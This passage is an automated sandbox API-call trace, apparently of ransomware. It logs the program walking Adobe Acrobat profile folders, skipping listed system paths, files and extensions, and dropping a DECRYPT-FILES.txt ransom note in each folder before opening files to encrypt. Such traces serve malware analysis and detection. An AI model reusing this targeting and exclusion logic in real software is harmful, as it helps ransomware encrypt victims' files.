ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd9df17a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Forms", cAlternateFileName="")) returned 1 [0076.767] lstrcmpW (lpString1="Forms", lpString2=".") returned 1 [0076.767] lstrcmpW (lpString1="Forms", lpString2="..") returned 1 [0076.767] lstrcatW (in: lpString1="Forms", lpString2="\\" | out: lpString1="Forms\\") returned="Forms\\" [0076.767] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="Forms\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\" [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\Program Files") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch=":\\Windows") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\Games\\") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\All Users") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="AhnLab") returned 0x0 [0076.767] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.767] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned 71 [0076.767] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.767] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\\\jkbimi8.tmp") returned 83 [0076.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\forms\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0076.768] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned 71 [0076.768] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.768] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\\\DECRYPT-FILES.txt") returned 89 [0076.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\forms\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0076.768] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0076.769] CloseHandle (hObject=0x45c) returned 1 [0076.769] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned 71 [0076.769] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*" [0076.769] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9df17a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0076.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.769] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9df17a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.769] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.769] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.769] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f6fa20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.769] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.769] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f6fa20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.770] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.770] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.770] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.770] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.770] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.770] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.770] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.770] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.770] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.770] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.770] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.770] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.770] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.770] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.770] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.770] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned 71 [0076.770] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.770] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\" [0076.770] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\jkbimi8.tmp" [0076.770] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\forms\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.770] CloseHandle (hObject=0x0) returned 0 [0076.771] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.771] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f6fa20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.771] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0076.771] CloseHandle (hObject=0x458) returned 1 [0076.771] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec7c9cd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JavaScripts", cAlternateFileName="JAVASC~1")) returned 1 [0076.771] lstrcmpW (lpString1="JavaScripts", lpString2=".") returned 1 [0076.771] lstrcmpW (lpString1="JavaScripts", lpString2="..") returned 1 [0076.771] lstrcatW (in: lpString1="JavaScripts", lpString2="\\" | out: lpString1="JavaScripts\\") returned="JavaScripts\\" [0076.771] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="JavaScripts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" [0076.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\Program Files") returned 0x0 [0076.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch=":\\Windows") returned 0x0 [0076.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\Games\\") returned 0x0 [0076.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\All Users") returned 0x0 [0076.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.772] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.772] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="AhnLab") returned 0x0 [0076.772] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.772] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0076.772] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.772] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\\\jkbimi8.tmp") returned 89 [0076.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0076.773] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0076.773] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.773] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\\\DECRYPT-FILES.txt") returned 95 [0076.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0076.775] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0076.776] CloseHandle (hObject=0x45c) returned 1 [0076.776] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0076.776] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*" [0076.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0076.776] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.776] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.776] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.776] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.776] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f6fa20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.776] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.776] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xedc00b50, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="glob.js", cAlternateFileName="")) returned 1 [0076.776] lstrcmpiW (lpString1="glob.js", lpString2="DECRYPT-FILES.txt") returned 1 [0076.777] lstrcmpiW (lpString1="glob.js", lpString2="autorun.inf") returned 1 [0076.777] lstrcmpiW (lpString1="glob.js", lpString2="boot.ini") returned 1 [0076.777] lstrcmpiW (lpString1="glob.js", lpString2="desktop.ini") returned 1 [0076.777] lstrcmpiW (lpString1="glob.js", lpString2="ntuser.dat") returned -1 [0076.777] lstrcmpiW (lpString1="glob.js", lpString2="iconcache.db") returned -1 [0076.777] lstrcmpiW (lpString1="glob.js", lpString2="bootsect.bak") returned 1 [0076.777] lstrcmpiW (lpString1="glob.js", lpString2="ntuser.dat.log") returned -1 [0076.777] lstrcmpiW (lpString1="glob.js", lpString2="thumbs.db") returned -1 [0076.777] lstrcmpiW (lpString1="glob.js", lpString2="Bootfont.bin") returned 1 [0076.777] lstrlenW (lpString="glob.js") returned 7 [0076.777] lstrcmpiW (lpString1="js", lpString2="lnk") returned -1 [0076.777] lstrcmpiW (lpString1="js", lpString2="exe") returned 1 [0076.777] lstrcmpiW (lpString1="js", lpString2="sys") returned -1 [0076.777] lstrcmpiW (lpString1="js", lpString2="dll") returned 1 [0076.777] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0076.777] lstrlenW (lpString="glob.js") returned 7 [0076.777] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" [0076.777] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpString2="glob.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" [0076.777] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0076.778] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=0) returned 1 [0076.778] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0076.778] CloseHandle (hObject=0x0) returned 0 [0076.778] CloseHandle (hObject=0x460) returned 1 [0076.778] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.778] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7c9cd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xedc00b50, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x0, dwReserved1=0x0, cFileName="glob.settings.js", cAlternateFileName="GLOBSE~1.JS")) returned 1 [0076.778] lstrcmpiW (lpString1="glob.settings.js", lpString2="DECRYPT-FILES.txt") returned 1 [0076.778] lstrcmpiW (lpString1="glob.settings.js", lpString2="autorun.inf") returned 1 [0076.778] lstrcmpiW (lpString1="glob.settings.js", lpString2="boot.ini") returned 1 [0076.778] lstrcmpiW (lpString1="glob.settings.js", lpString2="desktop.ini") returned 1 [0076.778] lstrcmpiW (lpString1="glob.settings.js", lpString2="ntuser.dat") returned -1 [0076.778] lstrcmpiW (lpString1="glob.settings.js", lpString2="iconcache.db") returned -1 [0076.778] lstrcmpiW (lpString1="glob.settings.js", lpString2="bootsect.bak") returned 1 [0076.778] lstrcmpiW (lpString1="glob.settings.js", lpString2="ntuser.dat.log") returned -1 [0076.778] lstrcmpiW (lpString1="glob.settings.js", lpString2="thumbs.db") returned -1 [0076.778] lstrcmpiW 